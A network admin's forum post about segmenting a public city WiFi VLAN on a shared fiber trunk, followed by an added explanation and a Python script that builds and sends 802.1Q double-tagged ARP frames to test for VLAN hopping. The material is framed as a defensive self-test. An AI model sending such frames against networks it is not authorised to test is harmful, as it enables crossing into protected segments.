Hey guys! So I'm about to go live with a public city WiFi project soon. 80% of the network will never touch our internal network; it's all physically separated. However, there are two point-to-multipoint links that will traverse our internal physical network, though separated by VLANs and ACLs. Below is the exact setup:
Public access point > Switch (the access point is on its own access port: a VLAN with ACLs and port isolation enabled; traffic goes across a fiber trunk port, and this switch does carry some of our corporate traffic over the same fiber uplink) > Uplink to core switch via fiber > A port on the core switch is set to the same VLAN as an access port, and dumps to a separate firewall.
Essentially, I'm only sharing a fiber trunk port back to my datacenter.
I feel that I have mitigated any risk, and I've done the normal Nmap/IP scanner run across the entire possible ranges to ensure nothing can talk, but I'd like to make sure I'm covering all my bases. Are there any other tools that I can run to ensure proper segmentation and ensure nothing could ever see our other traffic going across that shared fiber uplink?
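An Nmap sweep from the public VLAN only proves that Layer 3 is filtered; the classic way to cross a shared trunk at Layer 2 is 802.1Q double tagging, which works when the attacker's access VLAN happens to be the trunk's native VLAN (the first switch strips the outer tag and forwards the frame with the inner, corporate VLAN tag still attached). The script below is an added example, not part of the original post and not a vendor tool: it hand-builds a double-tagged ARP request so you can send it from a laptop on the public access port and watch with tcpdump on a corporate VLAN host to see whether it ever arrives. Interface name, MACs, IPs and the VLAN IDs are placeholders you supply; the raw-socket send is Linux-only and needs root. A frame that shows up on the far side means the outer VLAN is the native VLAN of the trunk and that needs to change (an unused native VLAN, or tagging the native VLAN on the trunk); no frame arriving is the expected result.

```python
"""
VLAN double-tagging check for a shared 802.1Q trunk.

Added example for the post above; placeholder values (interface, MACs,
IPs, VLAN IDs) are assumptions, not values from the original setup.
Run on the public access port; capture on a host in the corporate VLAN:
    tcpdump -e -n -i eth0 arp
"""
import socket
import struct
import sys

ETH_P_8021Q = 0x8100  # 802.1Q tag TPID
ETH_P_ARP = 0x0806


def mac_bytes(mac: str) -> bytes:
    """'00:11:22:33:44:55' -> 6 raw bytes."""
    return bytes(int(octet, 16) for octet in mac.split(":"))


def vlan_tag(vid: int, pcp: int = 0, dei: int = 0) -> bytes:
    """One 4-byte 802.1Q tag: TPID 0x8100 followed by the TCI (PCP/DEI/VID)."""
    if not 0 <= vid <= 4094:
        raise ValueError("VLAN ID out of range")
    tci = (pcp << 13) | (dei << 12) | vid
    return struct.pack("!HH", ETH_P_8021Q, tci)


def arp_request(src_mac: str, src_ip: str, target_ip: str) -> bytes:
    """Minimal ARP who-has; a broadcast ARP is easy to spot in a capture."""
    return struct.pack(
        "!HHBBH6s4s6s4s",
        1,            # hardware type: Ethernet
        0x0800,       # protocol type: IPv4
        6, 4,         # hardware / protocol address lengths
        1,            # opcode: request
        mac_bytes(src_mac), socket.inet_aton(src_ip),
        b"\x00" * 6, socket.inet_aton(target_ip),
    )


def double_tagged_frame(src_mac: str, outer_vid: int, inner_vid: int,
                        payload: bytes, ethertype: int = ETH_P_ARP,
                        dst_mac: str = "ff:ff:ff:ff:ff:ff") -> bytes:
    """dst | src | outer tag (our VLAN) | inner tag (target VLAN) | type | payload."""
    return (mac_bytes(dst_mac) + mac_bytes(src_mac)
            + vlan_tag(outer_vid) + vlan_tag(inner_vid)
            + struct.pack("!H", ethertype) + payload)


def parse_tags(frame: bytes) -> list:
    """VLAN IDs present in a frame, outermost first (use on the far-side capture)."""
    vids, off = [], 12
    while off + 4 <= len(frame) and struct.unpack("!H", frame[off:off + 2])[0] == ETH_P_8021Q:
        vids.append(struct.unpack("!H", frame[off + 2:off + 4])[0] & 0x0FFF)
        off += 4
    return vids


def send_frame(iface: str, frame: bytes, count: int = 5) -> int:
    """Push the raw frame out of iface (Linux AF_PACKET, needs CAP_NET_RAW)."""
    sent = 0
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as sock:
        sock.bind((iface, 0))
        for _ in range(count):
            sent += sock.send(frame)
    return sent


if __name__ == "__main__":
    # Placeholder values: iface, our MAC, a spare IP on the public VLAN,
    # an IP in the corporate VLAN, and the two VLAN IDs to test.
    if len(sys.argv) != 7:
        sys.exit("usage: vlan_hop_check.py IFACE SRC_MAC SRC_IP TARGET_IP OUTER_VID INNER_VID")
    iface, src_mac, src_ip, target_ip, outer, inner = sys.argv[1:]
    frame = double_tagged_frame(src_mac, int(outer), int(inner),
                                arp_request(src_mac, src_ip, target_ip))
    print(f"sending {len(frame)}-byte frame tagged {parse_tags(frame)} via {iface}")
    send_frame(iface, frame)
```

Run it once with the outer VLAN set to the public access VLAN and the inner VLAN set to each corporate VLAN that rides the same trunk; repeat after any change to the trunk's native VLAN, since that is the single setting this attack depends on. Note that some NICs with VLAN offload enabled will rewrite or strip tags on raw sends; disable it (`ethtool -K IFACE txvlan off` on Linux) before trusting a negative result.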